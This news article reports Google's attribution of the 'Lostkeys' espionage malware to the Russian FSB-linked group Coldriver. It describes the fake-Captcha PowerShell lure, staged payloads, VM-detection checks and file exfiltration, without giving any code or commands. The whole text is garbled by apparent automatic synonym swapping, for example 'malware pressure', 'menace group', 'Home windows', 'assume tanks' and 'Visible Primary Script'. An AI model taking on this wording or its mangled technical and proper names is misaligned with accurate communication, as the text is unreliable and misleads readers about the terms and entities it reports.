Russian FSB Hackers Deploy New Lostkeys Malware

Russian cyber espionage hackers are utilizing a brand new malware pressure dubbed “Lostkeys” in a focused espionage marketing campaign geared toward Western officers, NGOs and journalists.

See Additionally: OnDemand | North Korea’s Secret IT Military and Learn how to Fight It

Google researchers attribute Lostkeys to the menace group Coldriver, additionally tracked as UNC4057, Star Blizzard and Callisto. The group, an operational unit inside the Federal Safety Service – Russian successor of the KGB – is thought for credential phishing assaults. Lostkeys is proof that the group has improved its capabilities with a multi-stage an infection chain designed to steal paperwork and harvest delicate information.

Members of the menace group have been indicted within the U.S. and sanctioned in Europe, Britain and the U.S. A December 2023 warning printed by English-speaking international locations that make up the 5 Eyes intelligence alliance warned that the group continues to be energetic (see: UK and US Accuse Russian FSB of ‘Hack and Leak’ Operation).

Lostkeys marks a brand new instrument in Coldriver’s arsenal, representing an evolution from credential theft to full system infiltration, the Google Risk Intelligence Group stated. The group makes use of the malware selectively, solely deployed in high-value targets, the report stated.

Google noticed Lostkeys exercise in January, March and April, with indicators suggesting the malware might have first appeared as early as December 2023. Coldriver’s typical targets embody former and present Western authorities advisors, assume tanks, NGOs, journalists and people with ties to Ukraine.

The Lostkeys assault chain begins with a faux Captcha web page that tips victims into pasting malicious PowerShell code into their Home windows Run immediate, a method dubbed “ClickFix” (see: ClickFix Assaults More and more Result in Infostealer Infections).

The tactic of social engineering circumvents conventional safety controls and depends closely on person compliance. As soon as executed, the PowerShell script pulls in successive payloads, every retrieved from the identical command-and-control server however requiring distinctive identifiers per sufferer.

The malware reveals indicators of sandbox evasion. Earlier than advancing to the ultimate stage, the second-stage code checks the machine’s show decision hash and halts execution if it matches a identified digital machine setup.

The ultimate payload is a Visible Primary Script file, which exfiltrates recordsdata with particular extensions from focused directories, gathers system data and operating processes and sends them again to the attacker. The script is decoded utilizing a two-key substitution cipher, with every key pair distinctive to each an infection chain.

Lostkeys is harking back to Spica, a earlier malware pressure utilized by Coldriver in 2024. Whereas Spica was additionally designed for information theft, Lostkeys reveals a refined structure and extra superior supply mechanisms.

Though some Lostkeys samples dated again to December 2023 mimicked the Maltego software program package deal and used Moveable Executable recordsdata as an alternative of PowerShell, Google couldn’t verify whether or not these early variations had been a part of the identical operation or repurposed malware utilized by one other group.